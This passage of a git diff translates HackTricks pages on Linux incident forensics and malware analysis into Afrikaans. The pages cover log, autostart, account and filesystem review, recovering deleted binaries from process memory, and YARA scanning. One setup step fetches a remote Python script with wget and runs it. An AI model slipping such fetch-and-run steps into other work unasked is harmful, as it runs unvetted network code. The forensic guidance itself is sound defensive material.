RedHat-stelsels, oorweeg om stelsellogboeke en databasisse saam met handmatige kontroles in algemene gidslys te gebruik. -- For Debian, inspect **_`/var/lib/dpkg/status`_** and **_`/var/log/dpkg.log`_** to fetch details about package installations, using `grep` to filter for specific information. +- Vir Debian, ondersoek **_`/var/lib/dpkg/status`_** en **_`/var/log/dpkg.log`_** om besonderhede oor pakketaanbringings te verkry, deur `grep` te gebruik om te filtreer vir spesifieke inligting. -- RedHat users can query the RPM database with `rpm -qa --root=/mntpath/var/lib/rpm` to list installed packages. - -To uncover software installed manually or outside of these package managers, explore directories like **_`/usr/local`_**, **_`/opt`_**, **_`/usr/sbin`_**, **_`/usr/bin`_**, **_`/bin`_**, and **_`/sbin`_**. Combine directory listings with system-specific commands to identify executables not associated with known packages, enhancing your search for all installed programs. +- RedHat-gebruikers kan die RPM-databasis ondervra met `rpm -qa --root=/mntpath/var/lib/rpm` om geïnstalleerde pakkette te lys. +Om sagteware wat handmatig of buite hierdie pakketsbestuurders geïnstalleer is, op te spoor, verken gidslyste soos **_`/usr/local`_**, **_`/opt`_**, **_`/usr/sbin`_**, **_`/usr/bin`_**, **_`/bin`_**, en **_`/sbin`_**. Kombineer gidslyste met stelselspesifieke opdragte om uitvoerbare lêers te identifiseer wat nie met bekende pakkette geassosieer word nie, en verbeter soek na alle geïnstalleerde programme. ```bash # Debian package and log details cat /var/lib/dpkg/status | grep -E "Package:|Status:" @@ -213,30 +200,46 @@ find /sbin/ –exec rpm -qf {} \; | grep "is not" # Find exacuable files find / -type f -executable | grep ``` - -
-\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloeie te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Recover Deleted Running Binaries - -Imagina a process taht was executed from /tmp/exec and deleted. It's possible to extract it +## Herstel Verwyderde Lopende Binêre Lêers +Stel jou voor 'n proses wat uitgevoer is vanaf /tmp/exec en verwyder is. Dit is moontlik om dit te onttrek. ```bash cd /proc/3746/ #PID with the exec file deleted head -1 maps #Get address of the file. It was 08048000-08049000 dd if=mem bs=1 skip=08048000 count=1000 of=/tmp/exec2 #Recorver it ``` +## Inspekteer Autostart-plekke -## Inspect Autostart locations +### Geskeduleerde Take -### Scheduled Tasks +```html +Scheduled tasks are a common way for programs to run automatically at specific times or intervals. In Linux, the cron daemon is responsible for managing scheduled tasks. To inspect scheduled tasks, you can check the contents of the `/etc/cron.d/` directory and the user-specific cron files located in `/var/spool/cron/crontabs/`. +To view the contents of the `/etc/cron.d/` directory, you can use the following command: + +```bash +ls -l /etc/cron.d/ +``` + +This will display a list of files that correspond to scheduled tasks. Each file represents a separate task and contains the command to be executed and the schedule for when it should run. + +To view the user-specific cron files, you can use the following command: + +```bash +ls -l /var/spool/cron/crontabs/ +``` + +This will display a list of files that correspond to the cron files for each user. Each file represents a separate user and contains their individual scheduled tasks. + +Inspecting these autostart locations can help identify any suspicious or unauthorized tasks that may be running on the system. +``` ```bash cat /var/spool/cron/crontabs/* \ /var/spool/cron/atjobs \ @@ -250,63 +253,62 @@ cat /var/spool/cron/crontabs/* \ #MacOS ls -l /usr/lib/cron/tabs/ /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ``` +### Dienste -### Services +Paaie waar 'n kwaadwillige program as 'n diens geïnstalleer kan word: -Paths where a malware could be isntalled as a service: - -- **/etc/inittab**: Calls initialization scripts like rc.sysinit, directing further to startup scripts. -- **/etc/rc.d/** and **/etc/rc.boot/**: Contain scripts for service startup, the latter being found in older Linux versions. -- **/etc/init.d/**: Used in certain Linux versions like Debian for storing startup scripts. -- Services may also be activated via **/etc/inetd.conf** or **/etc/xinetd/**, depending on the Linux variant. -- **/etc/systemd/system**: A directory for system and service manager scripts. -- **/etc/systemd/system/multi-user.target.wants/**: Contains links to services that should be started in a multi-user runlevel. -- **/usr/local/etc/rc.d/**: For custom or third-party services. -- **~/.config/autostart/**: For user-specific automatic startup applications, which can be a hiding spot for user-targeted malware. -- **/lib/systemd/system/**: System-wide default unit files provided by installed packages. +- **/etc/inittab**: Roep inisialiseringsskripte soos rc.sysinit aan, wat verder verwys na opstartskripte. +- **/etc/rc.d/** en **/etc/rc.boot/**: Bevat skripte vir diensopstart, waarvan die laasgenoemde in ouer Linux-weergawes gevind word. +- **/etc/init.d/**: Word gebruik in sekere Linux-weergawes soos Debian om opstartskripte te stoor. +- Dienste kan ook geaktiveer word via **/etc/inetd.conf** of **/etc/xinetd/**, afhangende van die Linux-variant. +- **/etc/systemd/system**: 'n Gids vir stelsel- en diensbestuurskripte. +- **/etc/systemd/system/multi-user.target.wants/**: Bevat skakels na dienste wat in 'n multi-gebruiker vlak gestart moet word. +- **/usr/local/etc/rc.d/**: Vir aangepaste of derdeparty-dienste. +- **~/.config/autostart/**: Vir gebruikersspesifieke outomatiese opstarttoepassings, wat 'n versteekte plek vir gebruikersgerigte kwaadwillige programme kan wees. +- **/lib/systemd/system/**: Stelselwye verstek eenheidslêers wat deur geïnstalleerde pakkette voorsien word. -### Kernel Modules +### Kernelmodules -Linux kernel modules, often utilized by malware as rootkit components, are loaded at system boot. The directories and files critical for these modules include: +Linux-kernelmodules, dikwels deur kwaadwillige programme as rootkit-komponente gebruik, word by stelselopstart gelaai. Die kritieke gids en lêers vir hierdie modules sluit in: -- **/lib/modules/$(uname -r)**: Holds modules for the running kernel version. -- **/etc/modprobe.d**: Contains configuration files to control module loading. -- **/etc/modprobe** and **/etc/modprobe.conf**: Files for global module settings. +- **/lib/modules/$(uname -r)**: Bevat modules vir die lopende kernelweergawe. +- **/etc/modprobe.d**: Bevat konfigurasie-lêers om modulelaaiing te beheer. +- **/etc/modprobe** en **/etc/modprobe.conf**: Lêers vir globale module-instellings. -### Other Autostart Locations +### Ander outomatiese opstartlokasies -Linux employs various files for automatically executing programs upon user login, potentially harboring malware: +Linux maak gebruik van verskeie lêers om programme outomaties uit te voer wanneer 'n gebruiker aanmeld, wat potensieel kwaadwillige programme kan bevat: -- **/etc/profile.d/***, **/etc/profile**, and **/etc/bash.bashrc**: Executed for any user login. -- **~/.bashrc**, **~/.bash_profile**, **~/.profile**, and **~/.config/autostart**: User-specific files that run upon their login. -- **/etc/rc.local**: Runs after all system services have started, marking the end of the transition to a multiuser environment. +- **/etc/profile.d/***, **/etc/profile**, en **/etc/bash.bashrc**: Uitgevoer vir enige gebruikersaanmelding. +- **~/.bashrc**, **~/.bash_profile**, **~/.profile**, en **~/.config/autostart**: Gebruikersspesifieke lêers wat uitgevoer word wanneer hulle aanmeld. +- **/etc/rc.local**: Word uitgevoer nadat alle stelseldienste gestart het, wat die einde van die oorgang na 'n multi-gebruiker omgewing aandui. -## Examine Logs +## Ondersoek Loglêers -Linux systems track user activities and system events through various log files. These logs are pivotal for identifying unauthorized access, malware infections, and other security incidents. Key log files include: +Linux-stelsels hou gebruikersaktiwiteite en stelselgebeure by deur middel van verskeie loglêers. Hierdie loglêers is van kritieke belang vir die identifisering van ongemagtigde toegang, kwaadwillige infeksies en ander sekuriteitsvoorvalle. Sleutelloglêers sluit in: -- **/var/log/syslog** (Debian) or **/var/log/messages** (RedHat): Capture system-wide messages and activities. -- **/var/log/auth.log** (Debian) or **/var/log/secure** (RedHat): Record authentication attempts, successful and failed logins. - - Use `grep -iE "session opened for|accepted password|new session|not in sudoers" /var/log/auth.log` to filter relevant authentication events. -- **/var/log/boot.log**: Contains system startup messages. -- **/var/log/maillog** or **/var/log/mail.log**: Logs email server activities, useful for tracking email-related services. -- **/var/log/kern.log**: Stores kernel messages, including errors and warnings. -- **/var/log/dmesg**: Holds device driver messages. -- **/var/log/faillog**: Records failed login attempts, aiding in security breach investigations. -- **/var/log/cron**: Logs cron job executions. -- **/var/log/daemon.log**: Tracks background service activities. -- **/var/log/btmp**: Documents failed login attempts. -- **/var/log/httpd/**: Contains Apache HTTPD error and access logs. -- **/var/log/mysqld.log** or **/var/log/mysql.log**: Logs MySQL database activities. -- **/var/log/xferlog**: Records FTP file transfers. -- **/var/log/**: Always check for unexpected logs here. +- **/var/log/syslog** (Debian) of **/var/log/messages** (RedHat): Vang stelselwye boodskappe en aktiwiteite op. +- **/var/log/auth.log** (Debian) of **/var/log/secure** (RedHat): Neem outentiseringspogings, suksesvolle en mislukte aanmeldings op. +- Gebruik `grep -iE "session opened for|accepted password|new session|not in sudoers" /var/log/auth.log` om relevante outentiseringsgebeure te filter. +- **/var/log/boot.log**: Bevat stelselopstartboodskappe. +- **/var/log/maillog** of **/var/log/mail.log**: Log e-posbedieneraktiwiteite, nuttig vir die opspoor van e-posverwante dienste. +- **/var/log/kern.log**: Stoor kernelboodskappe, insluitend foute en waarskuwings. +- **/var/log/dmesg**: Bevat toestuurprogramboodskappe. +- **/var/log/faillog**: Neem mislukte aanmeldingspogings op, wat help met sekuriteitskrisisondersoeke. +- **/var/log/cron**: Log cron-werkuitvoerings. +- **/var/log/daemon.log**: Volg agtergronddiensaktiwiteite. +- **/var/log/btmp**: Dokumenteer mislukte aanmeldingspogings. +- **/var/log/httpd/**: Bevat Apache HTTPD-fout- en toegangsloglêers. +- **/var/log/mysqld.log** of **/var/log/mysql.log**: Log MySQL-databasisaktiwiteite. +- **/var/log/xferlog**: Neem FTP-lêeroordragte op. +- **/var/log/**: Kontroleer altyd vir onverwagte loglêers hier. {% hint style="info" %} -Linux system logs and audit subsystems may be disabled or deleted in an intrusion or malware incident. Because logs on Linux systems generally contain some of the most useful information about malicious activities, intruders routinely delete them. Therefore, when examining available log files, it is important to look for gaps or out of order entries that might be an indication of deletion or tampering. +Linux-stelselloglêers en oudit-subsisteme kan gedeaktiveer of uitgewis word tydens 'n inbreuk of kwaadwillige voorval. Omdat loglêers op Linux-stelsels gewoonlik van die nuttigste inligting oor kwaadwillige aktiwiteite bevat, verwyder indringers dit gereeld. Daarom is dit belangrik om, wanneer beskikbare loglêers ondersoek word, te kyk vir gaping of uit plek ininskrywings wat 'n aanduiding van uitwissing of manipulasie kan wees. {% endhint %} -**Linux maintains a command history for each user**, stored in: +**Linux hou 'n opdraggeskiedenis vir elke gebruiker by**, gestoor in: - ~/.bash_history - ~/.zsh_history @@ -314,42 +316,39 @@ Linux system logs and audit subsystems may be disabled or deleted in an intrusio - ~/.python_history - ~/.*_history -Moreover, the `last -Faiwx` command provides a list of user logins. Check it for unknown or unexpected logins. +Verder verskaf die `last -Faiwx`-opdrag 'n lys van gebruikersaanmeldings. Kontroleer dit vir onbekende of onverwagte aanmeldings. -Check files that can grant extra rprivileges: +Kontroleer lêers wat ekstra regte kan verleen: -- Review `/etc/sudoers` for unanticipated user privileges that may have been granted. -- Review `/etc/sudoers.d/` for unanticipated user privileges that may have been granted. -- Examine `/etc/groups` to identify any unusual group memberships or permissions. -- Examine `/etc/passwd` to identify any unusual group memberships or permissions. +- Ondersoek `/etc/sudoers` vir onverwagte gebruikersregte wat moontlik toegeken is. +- Ondersoek `/etc/sudoers.d/` vir onverwagte gebruikersregte wat moontlik toegeken is. +- Ondersoek `/etc/groups` om enige ongewone groepslidmaatskappe of -regte te identifiseer. +- Ondersoek `/etc/passwd` om enige ongewone groepslidmaatskappe of -regte te identifiseer. -Some apps alse generates its own logs: +Sommige programme genereer ook hul eie loglêers: -- **SSH**: Examine _~/.ssh/authorized_keys_ and _~/.ssh/known_hosts_ for unauthorized remote connections. -- **Gnome Desktop**: Look into _~/.recently-used.xbel_ for recently accessed files via Gnome applications. -- **Firefox/Chrome**: Check browser history and downloads in _~/.mozilla/firefox_ or _~/.config/google-chrome_ for suspicious activities. -- **VIM**: Review _~/.viminfo_ for usage details, such as accessed file paths and search history. -- **Open Office**: Check for recent document access that may indicate compromised files. -- **FTP/SFTP**: Review logs in _~/.ftp_history_ or _~/.sftp_history_ for file transfers that might be unauthorized. -- **MySQL**: Investigate _~/.mysql_history_ for executed MySQL queries, potentially revealing unauthorized database activities. -- **Less**: Analyze _~/.lesshst_ for usage history, including viewed files and commands executed. -- **Git**: Examine _~/.gitconfig_ and project _.git/logs_ for changes to repositories. +- **SSH**: Ondersoek _~/.ssh/authorized_keys_ en _~/.ssh/known_hosts_ vir ongemagtigde afstandsverbindinge. +- **Gnome Desktop**: Kyk na _~/.recently-used.xbel_ vir onlangs benaderde lêers via Gnome-toepassings. +- **Firefox/Chrome**: Kontroleer blaaiergeskiedenis en aflaaiers in _~/.mozilla/firefox_ of _~/.config/google-chrome_ vir verdagte aktiwiteite. +- **VIM**: Ondersoek _~/.viminfo_ vir gebruiksdetails, soos benaderde lêerpaadjies en soekgeskiedenis. +- **Open Office**: Kyk vir onlangse dokumenttoegang wat dui op gekompromitteerde lêers. +- **FTP/SFTP**: Ondersoek loglêers in _~/.ftp_history_ of _~/.sftp_history_ vir lêeroordragte wat moontlik ongemagtig is. +- **MySQL**: Ondersoek _~/.mysql_history_ vir uitgevoerde MySQL-navrae, wat moontlik ongemagtigde databasisaktiwiteite kan onthul. +- **Less**: Analiseer _~/.lesshst_ vir gebruiksgeskiedenis, insluitend besigtigde lêers en uitgevoerde opdragte. +- **Git**: Ondersoek _~/.gitconfig_ en projek _.git/logs_ vir veranderinge aan bewaarplekke. -### USB Logs +### USB-loglêers -[**usbrip**](https://github.com/snovvcrash/usbrip) is a small piece of software written in pure Python 3 which parses Linux log files (`/var/log/syslog*` or `/var/log/messages*` depending on the distro) for constructing USB event history tables. +[**usbrip**](https://github.com/snovvcrash/usbrip) is 'n klein stukkie sagteware wat in suiwer Python 3 geskryf is en Linux-loglêers (`/var/log/syslog*` of `/var/log/messages*` afhangende van die distribusie) ontleed om USB-gebeurtenisgeskiedenis-tabelle saam te stel. -It is interesting to **know all the USBs that have been used** and it will be more useful if you have an authorized list of USBs to find "violation events" (the use of USBs that aren't inside that list). - -### Installation +Dit is interessant om **alle USB's wat gebruik is**, te ken en dit sal nuttiger wees as jy 'n geoorloofde lys van USB's het om "oortredingsgebeure" (die gebruik van USB's wat nie binne daardie lys val nie) te vind. +### Installasie ```bash pip3 install usbrip usbrip ids download #Download USB ID database ``` - -### Examples - +### Voorbeelde ```bash usbrip events history #Get USB history of your curent linux machine usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR user @@ -357,115 +356,109 @@ usbrip events history --pid 0002 --vid 0e0f --user kali #Search by pid OR vid OR usbrip ids download #Downlaod database usbrip ids search --pid 0002 --vid 0e0f #Search for pid AND vid ``` - -More examples and info inside the github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip) +Meer voorbeelde en inligting binne die github: [https://github.com/snovvcrash/usbrip](https://github.com/snovvcrash/usbrip)
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Review User Accounts and Logon Activities +## Oorsig van Gebruikersrekeninge en Aantekenaktiwiteite -Examine the _**/etc/passwd**_, _**/etc/shadow**_ and **security logs** for unusual names or accounts created and or used in close proximity to known unauthorized events. Also, check possible sudo brute-force attacks.\ -Moreover, check files like _**/etc/sudoers**_ and _**/etc/groups**_ for unexpected privileges given to users.\ -Finally, look for accounts with **no passwords** or **easily guessed** passwords. +Ondersoek die _**/etc/passwd**_, _**/etc/shadow**_ en **sekuriteitslêers** vir ongewone name of rekeninge wat geskep is en/of gebruik is in die nabyheid van bekende ongemagtigde gebeure. Kyk ook na moontlike sudo-bruteforce-aanvalle.\ +Verder, kyk na lêers soos _**/etc/sudoers**_ en _**/etc/groups**_ vir onverwagte voorregte wat aan gebruikers gegee is.\ +Kyk uiteindelik vir rekeninge sonder wagwoorde of maklik raai wagwoorde. -## Examine File System +## Ondersoek Lêersisteem -### Analyzing File System Structures in Malware Investigation +### Analise van Lêersisteemstrukture in Malware-ondersoek -When investigating malware incidents, the structure of the file system is a crucial source of information, revealing both the sequence of events and the malware's content. However, malware authors are developing techniques to hinder this analysis, such as modifying file timestamps or avoiding the file system for data storage. +Wanneer malware-voorvalle ondersoek word, is die struktuur van die lêersisteem 'n belangrike bron van inligting wat beide die volgorde van gebeure en die inhoud van die malware onthul. Tog ontwikkel malware-skrywers tegnieke om hierdie analise te bemoeilik, soos die wysiging van lêerstempels of die vermyding van die lêersisteem vir data-opberging. -To counter these anti-forensic methods, it's essential to: - -- **Conduct a thorough timeline analysis** using tools like **Autopsy** for visualizing event timelines or **Sleuth Kit's** `mactime` for detailed timeline data. -- **Investigate unexpected scripts** in the system's $PATH, which might include shell or PHP scripts used by attackers. -- **Examine `/dev` for atypical files**, as it traditionally contains special files, but may house malware-related files. -- **Search for hidden files or directories** with names like ".. " (dot dot space) or "..^G" (dot dot control-G), which could conceal malicious content. -- **Identify setuid root files** using the command: - ```find / -user root -perm -04000 -print``` - This finds files with elevated permissions, which could be abused by attackers. -- **Review deletion timestamps** in inode tables to spot mass file deletions, possibly indicating the presence of rootkits or trojans. -- **Inspect consecutive inodes** for nearby malicious files after identifying one, as they may have been placed together. -- **Check common binary directories** (_/bin_, _/sbin_) for recently modified files, as these could be altered by malware. +Om hierdie teen-forensiese metodes te teenwerk, is dit noodsaaklik om: +- **'n Deeglike tydlyn-analise uit te voer** met behulp van instrumente soos **Autopsy** om gebeurtenis-tydlyne te visualiseer of **Sleuth Kit se** `mactime` vir gedetailleerde tydlyn-data. +- **Onverwagte skripte in die $PATH van die stelsel te ondersoek**, wat skulpskote of PHP-skripte wat deur aanvallers gebruik word, kan insluit. +- **`/dev` te ondersoek vir ongewone lêers**, aangesien dit tradisioneel spesiale lêers bevat, maar moontlik malware-verwante lêers kan huisves. +- **Te soek na verskuilde lêers of gidslyne** met name soos ".. " (punt punt spasie) of "..^G" (punt punt beheer-G), wat kwaadwillige inhoud kan verberg. +- **Setuid-root-lêers te identifiseer** met behulp van die opdrag: +```find / -user root -perm -04000 -print``` +Dit vind lêers met verhoogde voorregte wat deur aanvallers misbruik kan word. +- **Verwyderingstempelmerkers** in inode-tabelle te hersien om massiewe lêerverwyderings op te spoor, wat moontlik die teenwoordigheid van rootkits of trojane aandui. +- **Opeenvolgende inodes te ondersoek** vir nabygeleë kwaadwillige lêers nadat een geïdentifiseer is, aangesien hulle saam geplaas kon wees. +- **Gewone binêre gidslyne** (_/bin_, _/sbin_) te ondersoek vir onlangs gewysigde lêers, aangesien hierdie deur malware gewysig kon word. ```bash -# List recent files in a directory: +# List recent files in a directory: ls -laR --sort=time /bin``` -# Sort files in a directory by inode: +# Sort files in a directory by inode: ls -lai /bin | sort -n``` ``` - {% hint style="info" %} -Note that an **attacker** can **modify** the **time** to make **files appear** **legitimate**, but he **cannot** modify the **inode**. If you find that a **file** indicates that it was created and modified at the **same time** as the rest of the files in the same folder, but the **inode** is **unexpectedly bigger**, then the **timestamps of that file were modified**. +Let daarop dat 'n **aanvaller** die **tyd** kan **verander** om **lêers te laat voorkom** asof dit **wettig** is, maar hy kan die **inode** nie verander nie. As jy vind dat 'n **lêer** aandui dat dit geskep en verander is op dieselfde tyd as die res van die lêers in dieselfde vouer, maar die **inode** onverwags groter is, dan is die **tydstempels van daardie lêer verander**. {% endhint %} -## Compare files of different filesystem versions +## Vergelyk lêers van verskillende lêersisteemweergawes -### Filesystem Version Comparison Summary +### Opsomming van Vergelyking van Lêersisteemweergawes -To compare filesystem versions and pinpoint changes, we use simplified `git diff` commands: +Om lêersisteemweergawes te vergelyk en veranderinge te identifiseer, gebruik ons vereenvoudigde `git diff`-opdragte: -- **To find new files**, compare two directories: +- **Om nuwe lêers te vind**, vergelyk twee gidsen: ```bash git diff --no-index --diff-filter=A path/to/old_version/ path/to/new_version/ ``` - -- **For modified content**, list changes while ignoring specific lines: +- **Vir gewysigde inhoud**, lys veranderinge terwyl spesifieke lyne geïgnoreer word: ```bash git diff --no-index --diff-filter=M path/to/old_version/ path/to/new_version/ | grep -E "^\+" | grep -v "Installed-Time" ``` - -- **To detect deleted files**: +- **Om uitgewisde lêers op te spoor**: ```bash git diff --no-index --diff-filter=D path/to/old_version/ path/to/new_version/ ``` +- **Filteropsies** (`--diff-filter`) help om te versmalling na spesifieke veranderinge soos bygevoeg (`A`), verwyder (`D`), of gewysig (`M`) lêers. +- `A`: Bygevoegde lêers +- `C`: Gekopieerde lêers +- `D`: Verwyderde lêers +- `M`: Gewysigde lêers +- `R`: Hernoemde lêers +- `T`: Tipe veranderinge (bv. lêer na simbooliese skakel) +- `U`: Onversoenbare lêers +- `X`: Onbekende lêers +- `B`: Gebroke lêers -- **Filter options** (`--diff-filter`) help narrow down to specific changes like added (`A`), deleted (`D`), or modified (`M`) files. - - `A`: Added files - - `C`: Copied files - - `D`: Deleted files - - `M`: Modified files - - `R`: Renamed files - - `T`: Type changes (e.g., file to symlink) - - `U`: Unmerged files - - `X`: Unknown files - - `B`: Broken files - -## References +## Verwysings * [https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf](https://cdn.ttgtmedia.com/rms/security/Malware%20Forensics%20Field%20Guide%20for%20Linux%20Systems\_Ch3.pdf) * [https://www.plesk.com/blog/featured/linux-logs-explained/](https://www.plesk.com/blog/featured/linux-logs-explained/) * [https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203](https://git-scm.com/docs/git-diff#Documentation/git-diff.txt---diff-filterACDMRTUXB82308203) -* **Book: Malware Forensics Field Guide for Linux Systems: Digital Forensics Field Guides** +* **Boek: Malware Forensics Field Guide for Linux Systems: Digital Forensics Field Guides**
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** -**Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). +**Deel jou hacktruuks deur PR's in te dien by die** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **en** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werksvloeie** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\ +Kry Vandag Toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} diff --git a/forensics/basic-forensic-methodology/malware-analysis.md b/forensics/basic-forensic-methodology/malware-analysis.md index 2331fd321..e36882c30 100644 --- a/forensics/basic-forensic-methodology/malware-analysis.md +++ b/forensics/basic-forensic-methodology/malware-analysis.md @@ -1,24 +1,24 @@ -# Malware Analysis +# Malware Analise
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Forensics CheatSheets +## Forensiese Spiekbriefies [https://www.jaiminton.com/cheatsheet/DFIR/#](https://www.jaiminton.com/cheatsheet/DFIR/) -## Online Services +## Aanlyn Dienste * [VirusTotal](https://www.virustotal.com/gui/home/upload) * [HybridAnalysis](https://www.hybrid-analysis.com) @@ -26,136 +26,249 @@ Other ways to support HackTricks: * [Intezer](https://analyze.intezer.com) * [Any.Run](https://any.run/) -## Offline Antivirus and Detection Tools +## Aflyn Antivirus en Opvangs Gereedskap ### Yara -#### Install - +#### Installeer ```bash sudo apt-get install -y yara ``` +#### Maak reëls gereed -#### Prepare rules - -Use this script to download and merge all the yara malware rules from github: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ -Create the _**rules**_ directory and execute it. This will create a file called _**malware\_rules.yar**_ which contains all the yara rules for malware. - +Gebruik hierdie skrip om al die yara malware reëls vanaf GitHub af te laai en saam te voeg: [https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9](https://gist.github.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9)\ +Skep die _**reëls**_ gids en voer dit uit. Dit sal 'n lêer genaamd _**malware\_rules.yar**_ skep wat al die yara reëls vir malware bevat. ```bash wget https://gist.githubusercontent.com/andreafortuna/29c6ea48adf3d45a979a78763cdc7ce9/raw/4ec711d37f1b428b63bed1f786b26a0654aa2f31/malware_yara_rules.py mkdir rules python malware_yara_rules.py ``` +#### Skandering -#### Scan +Om te begin met die analise van malware, is dit belangrik om 'n skandering uit te voer op die verdagte lêer. Hierdie skandering sal help om enige bekende malware te identifiseer en om te bepaal of die lêer 'n potensiële bedreiging is. +Daar is verskeie skanderingstegnieke wat gebruik kan word, soos die gebruik van 'n antivirusprogram, 'n sandboks, of 'n statiese analisehulpmiddel. Dit is belangrik om 'n betroubare en up-to-date skanderingstegniek te gebruik om die beste resultate te verseker. + +Die skandering moet uitgevoer word op 'n geïsoleerde stelsel of in 'n virtuele omgewing om te voorkom dat die malware versprei of skade aanrig. Dit is ook belangrik om die skandering uit te voer met behulp van 'n gebruiker met beperkte regte om te voorkom dat die malware bevoorregte toegang verkry. + +As die skandering 'n bekende malware identifiseer, moet die nodige stappe geneem word om die malware te verwyder en die impak daarvan te beperk. As die skandering egter nie enige bekende malware identifiseer nie, moet verdere analise uitgevoer word om die aard en funksionaliteit van die lêer te bepaal. ```bash yara -w malware_rules.yar image #Scan 1 file yara -w malware_rules.yar folder #Scan the whole folder ``` +#### YaraGen: Kontroleer vir malware en Skep reëls -#### YaraGen: Check for malware and Create rules - -You can use the tool [**YaraGen**](https://github.com/Neo23x0/yarGen) to generate yara rules from a binary. Check out these tutorials: [**Part 1**](https://www.nextron-systems.com/2015/02/16/write-simple-sound-yara-rules/), [**Part 